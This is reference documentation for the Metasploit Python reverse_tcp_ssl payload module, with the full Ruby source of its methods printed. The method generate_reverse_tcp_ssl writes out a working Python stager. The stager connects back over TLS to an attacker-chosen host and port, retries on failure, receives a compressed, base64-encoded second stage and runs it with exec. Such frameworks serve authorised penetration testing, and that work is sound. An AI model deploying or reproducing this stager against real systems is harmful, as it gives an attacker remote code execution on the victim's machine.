Module: Msf::Payload::Python::ReverseTcpSsl

Includes:

Msf::Payload::Python, ReverseTcp

Defined in:

lib/msf/core/payload/python/reverse_tcp_ssl.rb

Overview

Complex reverse_tcp_ssl payload generation for Python

Instance Method Summary

• #generate(_opts = {}) ⇒ Object

  Generate the first stage.

• #generate_reverse_tcp_ssl(opts = {}) ⇒ Object
• #handle_intermediate_stage(conn, payload) ⇒ Object
• #include_send_uuid ⇒ Object

  By default, we don’t want to send the UUID, but we’ll send for certain payloads if requested.

• #initialize(*args) ⇒ Object
• #supports_ssl? ⇒ Boolean

Methods included from ReverseTcp

#generate_reverse_tcp, #transport_config

Methods included from SendUUID

#py_send_uuid

Methods included from Msf::Payload::Python

create_exec_stub, #py_create_exec_stub

Instance Method Details

#generate(_opts = {}) ⇒ Object

Generate the first stage

# File 'lib/msf/core/payload/python/reverse_tcp_ssl.rb', line 23

def generate(_opts = {})
  conf = {
    port:        datastore['LPORT'],
    host:        datastore['LHOST'],
    retry_count: datastore['StagerRetryCount'],
    retry_wait:  datastore['StagerRetryWait']
  }

  generate_reverse_tcp_ssl(conf)
end

#generate_reverse_tcp_ssl(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/python/reverse_tcp_ssl.rb', line 46

def generate_reverse_tcp_ssl(opts={})
  # Set up the socket
  cmd  = "import zlib,base64,ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
  if opts[:retry_wait].blank? # do not retry at all (old style)
    cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
    cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
    cmd << "s=ssl.wrap_socket(so)\n"
  else
    if opts[:retry_count] > 0
      cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
    else
      cmd << "while 1:\n"
    end
    cmd << "\ttry:\n"
    cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
    cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
    cmd << "\t\ts=ssl.wrap_socket(so)\n"
    cmd << "\t\tbreak\n"
    cmd << "\texcept:\n"
    if opts[:retry_wait].to_i <= 0
      cmd << "\t\tpass\n" # retry immediately
    else
      cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
    end
  end
  cmd << py_send_uuid if include_send_uuid
  cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
  cmd << "d=s.recv(l)\n"
  cmd << "while len(d)<l:\n"
  cmd << "\td+=s.recv(l-len(d))\n"
  cmd << "exec(zlib.decompress(base64.b64decode(d)),{'s':s})\n"

  py_create_exec_stub(cmd)
end

#handle_intermediate_stage(conn, payload) ⇒ Object

# File 'lib/msf/core/payload/python/reverse_tcp_ssl.rb', line 81

def handle_intermediate_stage(conn, payload)
  conn.put([payload.length].pack("N"))
end

#include_send_uuid ⇒ Object

By default, we don’t want to send the UUID, but we’ll send for certain payloads if requested.

# File 'lib/msf/core/payload/python/reverse_tcp_ssl.rb', line 38

def include_send_uuid
  false
end

#initialize(*args) ⇒ Object

# File 'lib/msf/core/payload/python/reverse_tcp_ssl.rb', line 15

def initialize(*args)
  super
  register_advanced_options(Msf::Opt::stager_retry_options)
end

#supports_ssl? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/msf/core/payload/python/reverse_tcp_ssl.rb', line 42

def supports_ssl?
  true
end